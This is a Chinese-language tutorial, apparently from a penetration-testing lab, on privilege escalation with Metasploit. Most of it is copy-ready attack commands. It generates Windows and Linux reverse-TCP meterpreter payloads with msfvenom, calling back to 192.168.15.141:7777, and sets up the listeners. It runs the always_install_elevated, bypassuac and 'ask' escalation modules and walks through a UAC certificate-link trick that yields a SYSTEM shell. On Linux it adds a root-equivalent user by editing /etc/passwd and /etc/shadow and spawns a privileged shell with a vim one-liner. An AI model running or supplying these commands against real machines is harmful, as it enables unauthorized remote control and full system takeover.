此时切换成普通用户来进行提权操作。
比如说已经使用msf会话控制了这台电脑,拥有普通用户的权限。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.15.141 LPORT=7777 -f exe -o payload.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.15.141
set lport 7777
exploit
查看权限
使用提权模块
use exploit/windows/local/always_install_elevated
根据返回的会话设置session的id
set session id号码
run
但是最后具体能不能run成功这个比较玄学,如果run成功会生成一个新的会话,就可以sessions -i 会话id
MSF绕过UAC
bypassuac模块
使用该模块提权的使用,当前用户必须是管理员组中的用户,UAC为默认设置
首先使用msf先进行监听靶机。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.15.141
set lport 7777
exploit
直接使用getsystem会失败,因为有UAC的问题。
使用msf搜索bypassuac的模块
search bypassuac
使用一个模块试试。
use exploit/windows/local/bypassuac
set session 1
run
绕过UAC后再提权,即可提权到system.
RUNAS模块
该模块会创建一个可执行文件,目标机器会运行一个发起提升权限请求的程序,提示用户是否要继续运行,如果用户选择继续运行程序,就会返回一个system权限的shell
这个模块对用户没有要求,但是普通用户点击需要输入管理员的账号密码,普通管理员点击通过即可。
use exploit/windows/local/ask
set session 1
run
漏洞原理
如果在运行一个可执行文件的时候我们触发了 UAC,在点击「显示有关此发步者的证书的信息」这个链接之后我们可以看到证书里的 Issued by(颁发者) 字段,这个字段对应的值就是 OID值,如果这里是一个超链接就可以提权,如果不是就不行。通过点击此链接会触发以 SYSTEM 权限打开浏览器,然后此浏览器就会有 SYSTEM 权限,(浏览器打开必须先要关闭UAC对话框)通过保存按钮打开CMD,CMD就会继承浏览器的 SYSTEM 权限,由此就完成了由普通用户到SYSTEM 用户的提权。
实验环境一台server2008
首先配合msf上线这个ubuntu。
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.15.141 LPORT=7777 -f elf > mshell.elf
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.15.141
set lport 7777
run
并且ubuntu执行恶意脚本。
利用vim提权
第一种方式,利用vim添加账号
vim /etc/passwd 添加特权用户
vim /etc/shadow 添加新用户密码
先打开passwd配置文件,复制root用户那一行,然后把root改成需要创建的新用户名称,这样就具备root权限
再打开shadow文件,同理可以找一些已知的密文密码复制进去即可。
使用这个新用户登录,那么此时拥有root权限
第二种方式,利用vim打开交互shell
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
配置好这个漏洞环境后,使用msf上线。
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.15.141 LPORT=7777 -f elf > mshell.elf
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.15.141
set lport 7777
run